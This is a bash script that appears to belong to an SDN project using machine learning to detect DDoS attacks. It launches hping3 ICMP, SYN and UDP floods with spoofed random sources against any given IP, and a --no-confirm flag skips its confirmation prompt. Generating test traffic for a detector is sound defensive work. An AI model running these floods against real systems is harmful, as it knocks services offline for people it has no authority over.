#!/bin/bash

###############################################################################
# DDoS Attack Traffic Generator for SDN Detection Testing
#
# Generates controlled DDoS attack traffic using hping3 within a Mininet
# environment. Used to test the SDN controller's ML-based detection and
# mitigation capabilities.
#
# WARNING: This script is for TESTING PURPOSES ONLY within an isolated
# Mininet virtual network. Never use against production networks.
#
# Attack Types:
#   ICMP Flood - High-rate ICMP echo requests with random source IPs
#   SYN Flood  - TCP SYN packets to port 80 with random source IPs
#   UDP Flood  - UDP packets to port 53 with random source IPs
#
# Usage:
#   sudo bash attack_generator.sh --type icmp --target 10.0.0.7 --duration 60
#   sudo bash attack_generator.sh --type all --target 10.0.0.7 --duration 30
#
# Requirements:
#   - hping3 installed
#   - Root privileges (sudo)
#   - Running inside Mininet environment
#
###############################################################################

# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
MAGENTA='\033[0;35m'
BOLD='\033[1m'
NC='\033[0m'

# Default configuration
DEFAULT_TARGET="10.0.0.7"
DEFAULT_DURATION=60
DEFAULT_TYPE="icmp"

# Resolved paths
SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
LOG_DIR="${SCRIPT_DIR}/../logs"
LOG_FILE="${LOG_DIR}/attack_history.txt"

# Track background PIDs for cleanup
ATTACK_PIDS=()

###############################################################################
# Function: print_banner
###############################################################################
print_banner() {
    echo ""
    echo -e "${RED}${BOLD}"
    echo "  ============================================================"
    echo "   DDoS Attack Traffic Generator - SDN Testing Environment"
    echo "  ============================================================"
    echo -e "${NC}"
    echo -e "  ${YELLOW}WARNING: For testing in isolated Mininet networks ONLY${NC}"
    echo ""
}

###############################################################################
# Function: show_help
###############################################################################
show_help() {
    echo "Usage: sudo bash attack_generator.sh [OPTIONS]"
    echo ""
    echo "Generate DDoS attack traffic for SDN detection testing."
    echo ""
    echo "Options:"
    echo "  --type TYPE       Attack type: icmp, syn, udp, or all (default: ${DEFAULT_TYPE})"
    echo "  --target IP       Target IP address (default: ${DEFAULT_TARGET})"
    echo "  --duration SECS   Attack duration in seconds (default: ${DEFAULT_DURATION})"
    echo "  --no-confirm      Skip confirmation prompt"
    echo "  -h, --help        Show this help message"
    echo ""
    echo "Examples:"
    echo "  sudo bash attack_generator.sh --type icmp --target 10.0.0.7 --duration 60"
    echo "  sudo bash attack_generator.sh --type syn --target 10.0.0.5 --duration 30"
    echo "  sudo bash attack_generator.sh --type all --target 10.0.0.7 --duration 20"
    echo ""
    echo "Attack Types:"
    echo "  icmp   ICMP Flood  - hping3 -1 --flood --rand-source TARGET"
    echo "  syn    SYN Flood   - hping3 -S --flood -p 80 --rand-source TARGET"
    echo "  udp    UDP Flood   - hping3 --udp --flood -p 53 --rand-source TARGET"
    echo "  all    Run all three types sequentially"
    echo ""
}

###############################################################################
# Function: check_root
###############################################################################
check_root() {
    if [ "$EUID" -ne 0 ]; then
        echo -e "${RED}[ERROR]${NC} This script must be run as root"
        echo "Usage: sudo bash attack_generator.sh [OPTIONS]"
        exit 1
    fi
}

###############################################################################
# Function: check_hping3
###############################################################################
check_hping3() {
    if ! command -v hping3 &> /dev/null; then
        echo -e "${RED}[ERROR]${NC} hping3 is not installed"
        echo ""
        echo "Install hping3:"
        echo "  Ubuntu/Debian: sudo apt-get install hping3"
        echo "  CentOS/RHEL:   sudo yum install hping3"
        exit 1
    fi
    echo -e "${GREEN}[OK]${NC} hping3 is installed"
}

###############################################################################
# Function: init_log
# Ensure log directory and file exist
###############################################################################
init_log() {
    mkdir -p "${LOG_DIR}"

    if [ ! -f "${LOG_FILE}" ]; then
        echo "# DDoS Attack History Log" > "${LOG_FILE}"
        echo "# Format: timestamp | type | target | duration | status" >> "${LOG_FILE}"
        echo "# Generated by traffic_generation/attack_generator.sh" >> "${LOG_FILE}"
        echo "---" >> "${LOG_FILE}"
    fi
}

###############################################################################
# Function: log_attack
# Arguments: $1=type, $2=target, $3=duration, $4=status
###############################################################################
log_attack() {
    local attack_type=$1
    local target=$2
    local duration=$3
    local status=$4
    local timestamp
    timestamp=$(date '+%Y-%m-%d %H:%M:%S')

    echo "${timestamp} | ${attack_type} | ${target} | ${duration}s | ${status}" \
        >> "${LOG_FILE}"
}

###############################################################################
# Function: cleanup
# Kill all background attack processes on exit
###############################################################################
cleanup() {
    echo ""
    echo -e "${YELLOW}[STOP]${NC} Stopping attack processes..."

    # Kill tracked PIDs
    for pid in "${ATTACK_PIDS[@]}"; do
        if kill -0 "$pid" 2>/dev/null; then
            kill "$pid" 2>/dev/null
            wait "$pid" 2>/dev/null
        fi
    done

    # Kill any remaining hping3 processes started by this script
    pkill -f "hping3" 2>/dev/null

    echo -e "${GREEN}[OK]${NC} All attack processes stopped"
    echo ""
}

# Register cleanup on script exit and signals
trap cleanup EXIT
trap cleanup SIGINT SIGTERM

###############################################################################
# Function: print_attack_details
# Arguments: $1=type, $2=target, $3=duration, $4=command
###############################################################################
print_attack_details() {
    local attack_type=$1
    local target=$2
    local duration=$3
    local command=$4

    echo ""
    echo -e "${MAGENTA}  ┌──────────────────────────────────────────────┐${NC}"
    echo -e "${MAGENTA}  │           ATTACK CONFIGURATION               │${NC}"
    echo -e "${MAGENTA}  ├──────────────────────────────────────────────┤${NC}"
    echo -e "${MAGENTA}  │${NC}  Type:     ${BOLD}${attack_type}${NC}"
    echo -e "${MAGENTA}  │${NC}  Target:   ${BOLD}${target}${NC}"
    echo -e "${MAGENTA}  │${NC}  Duration: ${BOLD}${duration} seconds${NC}"
    echo -e "${MAGENTA}  │${NC}  Command:  ${command}"
    echo -e "${MAGENTA}  │${NC}  Stop:     ${BOLD}Ctrl+C${NC}"
    echo -e "${MAGENTA}  └──────────────────────────────────────────────┘${NC}"
    echo ""
}

###############################################################################
# Function: confirm_attack
# Ask user for confirmation before launching attack
###############################################################################
confirm_attack() {
    local attack_type=$1
    local target=$2
    local duration=$3

    echo -e "${RED}${BOLD}"
    echo "  !! WARNING !!"
    echo -e "${NC}"
    echo -e "  You are about to launch a ${RED}${BOLD}${attack_type}${NC} attack:"
    echo -e "    Target:   ${BOLD}${target}${NC}"
    echo -e "    Duration: ${BOLD}${duration} seconds${NC}"
    echo ""
    echo -e "  ${YELLOW}This should ONLY be used in an isolated Mininet test environment.${NC}"
    echo ""

    read -r -p "  Proceed with attack? [y/N]: " response
    case "$response" in
        [yY][eE][sS]|[yY])
            return 0
            ;;
        *)
            echo -e "\n  ${BLUE}[INFO]${NC} Attack cancelled by user"
            exit 0
            ;;
    esac
}

###############################################################################
# Function: run_attack
# Arguments: $1=type, $2=target, $3=duration
###############################################################################
run_attack() {
    local attack_type=$1
    local target=$2
    local duration=$3
    local hping_cmd=""
    local type_label=""

    # Build hping3 command based on attack type
    case "$attack_type" in
        icmp)
            type_label="ICMP Flood"
            hping_cmd="hping3 -1 --flood --rand-source ${target}"
            ;;
        syn)
            type_label="SYN Flood"
            hping_cmd="hping3 -S --flood -p 80 --rand-source ${target}"
            ;;
        udp)
            type_label="UDP Flood"
            hping_cmd="hping3 --udp --flood -p 53 --rand-source ${target}"
            ;;
        *)
            echo -e "${RED}[ERROR]${NC} Unknown attack type: ${attack_type}"
            echo "Valid types: icmp, syn, udp, all"
            exit 1
            ;;
    esac

    # Display attack details
    print_attack_details "${type_label}" "${target}" "${duration}" "${hping_cmd}"

    # Log attack start
    log_attack "${type_label}" "${target}" "${duration}" "STARTED"

    # Launch attack in background
    echo -e "  ${RED}[ATTACK]${NC} Launching ${BOLD}${type_label}${NC}..."
    echo -e "  ${BLUE}[INFO]${NC} Press Ctrl+C to stop early"
    echo ""

    # Run hping3 in the background
    ${hping_cmd} >/dev/null 2>&1 &
    local attack_pid=$!
    ATTACK_PIDS+=("$attack_pid")

    # Countdown timer showing remaining time
    local elapsed=0
    while [ $elapsed -lt "$duration" ]; do
        local remaining=$((duration - elapsed))

        # Print progress every 5 seconds
        if [ $((elapsed % 5)) -eq 0 ]; then
            echo -e "  ${RED}[ACTIVE]${NC} ${type_label} in progress... " \
                "${remaining}s remaining (PID: ${attack_pid})"
        fi

        sleep 1
        elapsed=$((elapsed + 1))

        # Check if hping3 process is still running
        if ! kill -0 "$attack_pid" 2>/dev/null; then
            echo -e "  ${YELLOW}[WARN]${NC} Attack process ended early"
            break
        fi
    done

    # Stop the attack
    if kill -0 "$attack_pid" 2>/dev/null; then
        kill "$attack_pid" 2>/dev/null
        wait "$attack_pid" 2>/dev/null
    fi

    echo -e "  ${GREEN}[DONE]${NC} ${type_label} completed (${elapsed}s)"

    # Log attack completion
    log_attack "${type_label}" "${target}" "${elapsed}" "COMPLETED"

    echo ""
}

###############################################################################
# Function: run_all_attacks
# Run all three attack types sequentially
# Arguments: $1=target, $2=duration (per attack)
###############################################################################
run_all_attacks() {
    local target=$1
    local duration=$2

    echo -e "${BLUE}[INFO]${NC} Running all attack types sequentially"
    echo -e "${BLUE}[INFO]${NC} Duration per attack: ${duration} seconds"
    echo -e "${BLUE}[INFO]${NC} Total estimated time: $((duration * 3)) seconds"
    echo ""

    # Run each attack type with a pause between them
    local attack_num=1
    for attack_type in icmp syn udp; do
        echo -e "${BLUE}[${attack_num}/3]${NC} Starting ${attack_type} attack..."
        run_attack "${attack_type}" "${target}" "${duration}"

        # Pause between attacks (except after the last one)
        if [ $attack_num -lt 3 ]; then
            echo -e "  ${BLUE}[INFO]${NC} Pausing 5 seconds before next attack..."
            sleep 5
        fi

        attack_num=$((attack_num + 1))
    done

    echo -e "${GREEN}[COMPLETE]${NC} All attack types executed"
}

###############################################################################
# Main Script
###############################################################################
main() {
    # Default values
    local attack_type="${DEFAULT_TYPE}"
    local target="${DEFAULT_TARGET}"
    local duration="${DEFAULT_DURATION}"
    local no_confirm=false

    # Parse command-line arguments
    while [[ $# -gt 0 ]]; do
        case "$1" in
            --type)
                attack_type="$2"
                shift 2
                ;;
            --target)
                target="$2"
                shift 2
                ;;
            --duration)
                duration="$2"
                shift 2
                ;;
            --no-confirm)
                no_confirm=true
                shift
                ;;
            -h|--help)
                show_help
                exit 0
                ;;
            *)
                echo -e "${RED}[ERROR]${NC} Unknown option: $1"
                show_help
                exit 1
                ;;
        esac
    done

    # Validate attack type
    case "$attack_type" in
        icmp|syn|udp|all)
            ;;
        *)
            echo -e "${RED}[ERROR]${NC} Invalid attack type: ${attack_type}"
            echo "Valid types: icmp, syn, udp, all"
            exit 1
            ;;
    esac

    # Validate duration is a positive integer
    if ! [[ "$duration" =~ ^[0-9]+$ ]] || [ "$duration" -le 0 ]; then
        echo -e "${RED}[ERROR]${NC} Duration must be a positive integer"
        exit 1
    fi

    # Validate target IP format (basic check)
    if ! [[ "$target" =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]]; then
        echo -e "${RED}[ERROR]${NC} Invalid IP address format: ${target}"
        exit 1
    fi

    # Print banner
    print_banner

    # Check prerequisites
    check_root
    check_hping3

    # Initialize logging
    init_log

    # Request confirmation (unless --no-confirm)
    if [ "$no_confirm" = false ]; then
        if [ "$attack_type" = "all" ]; then
            confirm_attack "ALL ATTACKS (ICMP + SYN + UDP)" "${target}" \
                "$((duration * 3)) total (${duration} each)"
        else
            confirm_attack "${attack_type^^} FLOOD" "${target}" "${duration}"
        fi
    fi

    echo ""
    echo -e "${BLUE}[INFO]${NC} Attack log: ${LOG_FILE}"
    echo ""

    # Execute attack(s)
    if [ "$attack_type" = "all" ]; then
        run_all_attacks "${target}" "${duration}"
    else
        run_attack "${attack_type}" "${target}" "${duration}"
    fi

    # Final summary
    echo "============================================================"
    echo -e "${GREEN}[SUMMARY]${NC} Attack generation complete"
    echo -e "  Type:     ${attack_type}"
    echo -e "  Target:   ${target}"
    echo -e "  Log file: ${LOG_FILE}"
    echo ""
    echo -e "  Check detection results:"
    echo -e "    cat ../logs/attacks_log.csv"
    echo ""
}

# Execute main function with all arguments
main "$@"
